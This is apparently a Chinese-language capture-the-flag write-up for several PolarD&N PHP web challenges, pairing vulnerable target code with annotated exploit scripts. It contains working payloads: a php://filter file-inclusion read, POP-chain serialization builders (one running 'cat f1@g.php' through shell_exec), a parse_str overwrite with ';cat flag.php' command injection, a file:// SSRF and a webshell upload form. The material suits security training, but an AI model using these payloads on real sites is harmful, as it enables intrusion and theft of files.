phar:
<?php
// Challenge entry point (this is what highlight_file() prints). myWaf(), A, B
// and C are defined in funs.php, included below.
include 'funs.php';
highlight_file(__FILE__);
if (isset($_GET['file'])) {
// Sink 1: file inclusion. Any `file` value that myWaf() accepts is include()d
// verbatim, so stream wrappers such as php://filter reach this line.
if (myWaf($_GET['file'])) {
include($_GET['file']);
} else {
// Sink 2: unserialize() of raw user input. Reached only when myWaf() rejects
// `file`, i.e. deliberately tripping the WAF is the route to this sink.
unserialize($_GET['data']);
}
}
发现文件包含漏洞。myWaf() 只拦截含 `f1@g`(不区分大小写)的字符串,其它内容原样交给 include(),因此可以用 php://filter 伪协议把 funs.php 以 base64 形式读出而不执行。payload:/?file=php://filter/convert.base64-encode/resource=funs.php
base64 解码后得到 funs.php:
<?php
include 'f1@g.php';
/**
 * Blocklist "WAF" for the `file` parameter.
 *
 * Returns FALSE (after printing a taunt) when $data contains "f1@g" in any
 * letter case, TRUE otherwise. Nothing else is filtered, so stream wrappers
 * such as php://filter and any other file name pass straight through to
 * include(). A FALSE return is also what routes the request to unserialize().
 */
function myWaf($data)
{
if (preg_match("/f1@g/i", $data)) {
echo "NONONONON0!";
return FALSE;
} else {
return TRUE;
}
}
/**
 * Head of the POP chain. __destruct runs when the unserialized object is
 * freed and concatenates the private $a into a string; an object stored in
 * $a (a B) therefore has its __toString called.
 */
class A
{
private $a;
public function __destruct()
{
echo "A->" . $this->a . "destruct!"; // string conversion of $this->a
}
}
/**
 * Middle link. __toString (triggered when A stringifies $a) reads
 * $b['kfc']->vm50; if $b['kfc'] is a C, which declares no vm50 property,
 * the read is dispatched to C::__get('vm50').
 */
class B
{
private $b = array();
public function __toString()
{
$str_array= $this->b;
$str2 = $str_array['kfc']->vm50; // undefined-property read -> __get on the stored object
return "Crazy Thursday".$str2;
}
}
/**
 * Tail of the chain. __get is reached when B reads the undefined ->vm50 on a
 * C; it takes $c[$kfc] as a variable *name* and var_dumps that variable
 * ($$f). With $c['vm50'] = 'flag' this is var_dump($flag); $flag is pulled in
 * by `global $flag` and is presumably defined by the included f1@g.php (not
 * shown here). __get returns nothing, so B's $str2 ends up null.
 */
class C{
private $c = array();
public function __get($kfc){
global $flag;
$f = $this->c[$kfc];
var_dump($$f); // variable-variable: dumps the variable whose name is in $f
}
}
发现反序列化漏洞,构造 pop 链:
A::__destruct → B::__toString → C::__get。A 析构时把 $this->a 拼进字符串,触发 B::__toString;B 读取 $b['kfc']->vm50,C 没有 vm50 属性,触发 C::__get('vm50');__get 取 $c['vm50']='flag' 作为变量名执行 var_dump($$f),即 var_dump($flag)。
<?php
/**
 * Attacker-side copy of A, used only to build the payload. The property is
 * public here so serialize() emits a plain (unmangled) name.
 */
class A
{
public $a;
public function __construct()
{
// A B stored here is stringified by the target's A::__destruct -> B::__toString
$this->a = new B();
}
}
/**
 * Attacker-side copy of B. The target's B::__toString reads $b['kfc']->vm50,
 * so the 'kfc' slot carries the C whose __get finishes the chain.
 */
class B
{
public $b = [];
public function __construct()
{
$this->b = ['kfc' => new C()];
}
}
/**
 * Attacker-side copy of C. The target's C::__get('vm50') does
 * var_dump($$f) with $f = $c['vm50'], so storing 'flag' makes it dump $flag.
 */
class C
{
public $c = [];
public function __construct()
{
$this->c = ['vm50' => 'flag'];
}
}
// Constructing A nests B and C automatically (A -> B -> C).
$chain = new A();
// urlencode so the payload can be pasted straight into the `data` query parameter.
echo urlencode(serialize($chain));
最终 payload(file 参数必须命中 WAF,即含 f1@g,让 myWaf 返回 FALSE 才会走到 else 分支的 unserialize;另外 funs.php 中 $a、$b、$c 声明为 private,而 payload 用的是未修饰的属性名,这依赖 PHP ≥ 7.1 的 unserialize 对属性可见性不敏感,若目标版本较低需改用 %00A%00a 这类私有属性写法):/?file=f1@g&data=O%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3Ba%3A1%3A%7Bs%3A3%3A%22kfc%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Ba%3A1%3A%7Bs%3A4%3A%22vm50%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D
覆盖:
<?php
error_reporting(0);
if (empty($_GET['id'])) {
show_source(__FILE__);
die();
} else {
include 'flag.php';
$a = "www.baidu.com";
$result = "";
$id = $_GET['id'];
// Variable-overwrite sink: single-argument parse_str() writes the parsed keys
// straight into the current scope, so `id=a[0]=...` replaces $a (a string)
// with an array. (This one-argument form was deprecated in PHP 7.2 and
// removed in 8.0, so the challenge depends on an older runtime.)
@parse_str($id);
echo $a[0];
if ($a[0] == 'www.polarctf.com') {
$ip = $_GET['cmd'];
// Command-injection sink: $a[0] and `cmd` are concatenated unescaped into the shell command.
$result .= shell_exec('ping -c 2 ' . $a[0] . $ip);
if ($result) {
echo "<pre>{$result}</pre>";
}
} else {
exit('其实很简单!');
}
}
通过代码审计可知需要 $a[0] == 'www.polarctf.com' 才能到达命令执行:$a 原本是字符串 "www.baidu.com",单参数 parse_str() 把 id 中的 a[0]=... 直接写进当前作用域,$a 被覆盖为数组 ['0' => 'www.polarctf.com'],随后 $a[0] 与 cmd 未经转义拼进 shell_exec。(注意 parse_str() 的单参数形式在 PHP 7.2 弃用、8.0 移除,此题依赖旧版本。)
payload:?id=a[0]=www.polarctf.com&cmd=;cat flag.php
flag 在页面源码里:cat 的输出被放进 <pre>,flag.php 里的 <?php ... ?> 推测会被浏览器当成标签吞掉,查看页面源代码即可看到。
csdn:
进入页面发现url有猫腻猜测是ssrf漏洞
查看源码有提示
payload:file://flag/flag.txt
PlayGame:
<?php
/*
PolarD&N CTF
*/
/**
 * Target-side User. __toString concatenates name/age/sex. Note that setAge()
 * and setSex() use `$this->$age` / `$this->$sex` (variable property names),
 * so they create a property named after the *value* rather than assigning
 * $age/$sex; irrelevant to the chain, which only needs $name.
 */
class User{
public $name;
public $age;
public $sex;
public function __toString()
{
return "name:".$this->name."age:".$this->age."sex:".$this->sex;
}
public function setName($name){
$this->name=$name;
}
public function setAge($age){
// variable-variable property: `$this->$age`, not `$this->age`
$this->$age=$age;
}
public function setSex($sex){
$this->$sex=$sex;
}
}
/**
 * Target-side PlayGame. __destruct echoes $user->name . "GameOver!"; when
 * $user->name holds another PlayGame, the concatenation calls its __toString,
 * which calls openGame() and so file_get_contents()s the attacker-chosen
 * $gameFile.
 */
class PlayGame{
public $user;
public $gameFile="./game"; // default; the payload replaces it with the file to read
public function openGame(){
return file_get_contents($this->gameFile); // arbitrary file read sink
}
public function __destruct()
{
echo $this->user->name."GameOver!"; // chain start: runs when the unserialized object is freed
}
public function __toString(){
return $this->user->name."PlayGame ". $this->user->age . $this->openGame();
}
}
// Sink: unserialize() of a raw GET parameter. The key contains both `_` and
// `.`; PHP rewrites `.` in incoming parameter names to `_`, so the name cannot
// be sent literally. The bypass the original note points at is to send
// `polar[flag.flag=...`: the unmatched `[` is turned into `_` and the later
// `.` is left alone. Confirm against the target's PHP version.
if(isset($_GET['polar_flag.flag'])){
unserialize($_GET['polar_flag.flag']);
}else{
highlight_file(__FILE__);
}
链:PlayGame::__destruct → echo $this->user->name,其中 $user 是一个 User,User 的 $name 里放第二个 PlayGame 对象 → 字符串拼接触发 PlayGame::__toString → openGame() → file_get_contents($gameFile),把 $gameFile 改成 /flag 即可读出。
pop:
<?php
/**
 * Attacker-side copy of User. Property names and order match the target so
 * serialize() output lines up; only $name is used by the chain.
 */
class User
{
public $name;
public $age;
public $sex;
public function __toString()
{
$text = "name:" . $this->name;
$text .= "age:" . $this->age;
$text .= "sex:" . $this->sex;
return $text;
}
public function setName($name)
{
$this->name = $name;
}
public function setAge($age)
{
// variable property name, reproduced as in the target
$this->$age = $age;
}
public function setSex($sex)
{
$this->$sex = $sex;
}
}
/**
 * Attacker-side copy of PlayGame with $gameFile pointed at /flag. The magic
 * methods are kept so the class matches the target; they also run on the
 * attacker machine when the script exits, so warnings and "GameOver!" may be
 * appended after the payload — harmless, just don't paste that part.
 */
class PlayGame
{
public $user;
public $gameFile = "/flag"; // handed to file_get_contents() by the target's openGame()
public function openGame()
{
$path = $this->gameFile;
return file_get_contents($path);
}
public function __destruct()
{
$label = $this->user->name;
echo $label . "GameOver!";
}
public function __toString()
{
$head = $this->user->name . "PlayGame ";
return $head . $this->user->age . $this->openGame();
}
}
// Head: __destruct stringifies $user->name.
$outer = new PlayGame();
// Carrier: its $name holds the second PlayGame.
$carrier = new User();
// Inner: __toString -> openGame() -> file_get_contents('/flag').
$inner = new PlayGame();
$outer->user = $carrier;
$carrier->name = $inner;
echo serialize($outer);
?>
flag在源码
flie
页面提示用 dirsearch 扫描
发现 upload.php 和 uploaded 两个路径
一个是上传页面,一个是上传后的存放目录
上传 webshell 后按“路径+文件名”访问即可 getshell
uploader:
自己写一个上传表单
<!-- Minimal multipart upload form for the discovered upload.php endpoint.
     Replace "你的url" with the target's upload.php URL. The field name
     "file" is a guess at what upload.php reads from $_FILES; if the upload is
     silently ignored, confirm the expected field name against the target. -->
<html>
<head>
<meta charset="utf-8">
<title>上传文件</title>
</head>
<body>
<!-- enctype must stay multipart/form-data, otherwise the file bytes are not sent -->
<form action="你的url" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
路径+文件名访问即可
PHP反序列化初试
//pop:
<?php
/**
 * Attacker-side Easy. The target's __wakeup echoes $name, which stringifies
 * the Evil stored there and so triggers Evil::__toString.
 */
class Easy
{
public $name;
public function __wakeup()
{
print $this->name;
}
}
/**
 * Attacker-side Evil. $evil is the command the target's __toString passes to
 * shell_exec(). $env is private, so it serializes as "\0Evil\0env"; the
 * urlencode() at the end keeps those NUL bytes intact (%00).
 */
class Evil
{
public $evil;
private $env;
public function __toString()
{
$output = shell_exec($this->evil);
$this->env = $output;
return $this->env;
}
}
$wrapper = new Easy();
$payload = new Evil();
// Command the target's Evil::__toString hands to shell_exec().
$payload->evil = "cat f1@g.php";
// Easy::__wakeup echoes $name -> Evil::__toString.
$wrapper->name = $payload;
echo urlencode(serialize($wrapper));
?>
机器人
用 dirsearch 扫描即可(题名“机器人”应是在提示 robots.txt)
PHP_Deserialization
<?php
/**
 * Attacker-side Polar. __wakeup calls hacker() on $night; a Night has no such
 * method, so the call lands in Night::__call with $night_arg as argument 0.
 */
class Polar
{
public $night;
public $night_arg;
public function __wakeup()
{
echo "hacker";
$target = $this->night;
$target->hacker($this->night_arg);
}
}
/**
 * Attacker-side Night. __call echoes the first argument, which stringifies
 * it — for a Day that relies on the target's Day having a __toString (the
 * target's Day is not reproduced on this page).
 */
class Night
{
public function __call($name, $arguments)
{
$first = $arguments[0];
echo "wrong call:" . $name . " arg:" . $first;
}
}
/**
 * Attacker-side Day. The original note says "double-write bypass": the
 * target presumably strips "flag" from $filename once before reading it, and
 * removing the inner "flag" from "/flflagag" leaves "/flag". Confirm the
 * filter against the target's Day source, which is not shown here.
 */
class Day
{
public $filename = "/flflagag";
}
$head = new Polar();
$caller = new Night();
$target = new Day();
// Polar::__wakeup -> $night->hacker() -> Night::__call
$head->night = $caller;
// stringified inside __call -> Day's __toString on the target
$head->night_arg = $target;
echo base64_encode(serialize($head));
?>
苦海:
<?php
/**
 * Attacker-side User. Chain entry on the target: __wakeup -> printName() ->
 * echo $name, which stringifies the Surrender stored in $name. Note the
 * constructor echoes a banner on the attacker side as well.
 */
class User
{
public $name;
public $flag;
public function __construct()
{
echo "删库跑路,蹲监狱~";
}
public function printName()
{
$label = $this->name;
echo $label;
return 'ok';
}
public function __wakeup()
{
echo "hi, Welcome to Polar D&N ~ ";
$this->printName();
}
public function __get($cc)
{
$msg = "give you flag : " . $this->flag;
echo $msg;
}
}
/**
 * Attacker-side Surrender. $file is never declared; the chain sets
 * $file['filename'] as a dynamic property. __toString reads ->content on the
 * FileRobot stored there, which has no such property, so the read goes to
 * FileRobot::__get('content').
 */
class Surrender
{
private $phone = 110;
public $promise = '遵纪守法,好公民~';
public function __construct()
{
$this->promise = '苦海无涯,回头是岸!';
return $this->promise; // discarded by `new`
}
public function __toString()
{
$robot = $this->file['filename'];
return $robot->content['title'];
}
}
/**
 * Attacker-side FileRobot. __get calls whatever is in $path; when $path is a
 * second FileRobot, that is FileRobot::__invoke, which base64-encodes and
 * echoes the file named by $filename.
 */
class FileRobot
{
public $filename = '../flag.php';
public $path;
public function __get($name)
{
$callable = $this->path;
return $callable();
}
public function Get_file($file)
{
$encoded = base64_encode(file_get_contents($file));
echo $encoded;
}
public function __invoke()
{
// Get_file() already echoed and returns null, so this echo adds nothing.
$content = $this->Get_file($this->filename);
echo $content;
}
}
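// Chain: User::__wakeup -> printName() -> echo $name (Surrender)
//   -> Surrender::__toString -> $file['filename']->content (FileRobot)
//   -> FileRobot::__get -> $path() (second FileRobot) -> __invoke
//   -> Get_file('../flag.php').
// User::__construct echoes a banner; buffer and discard it so stdout holds
// only the payload (otherwise the banner is glued onto the front of it).
ob_start();
$A = new User();
$B = new Surrender();
$C = new FileRobot();
$D = new FileRobot();
ob_end_clean();
$A->name = $B;
$B->file['filename'] = $C;
$C->path = $D;
echo urlencode(serialize($A));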
?>
java不会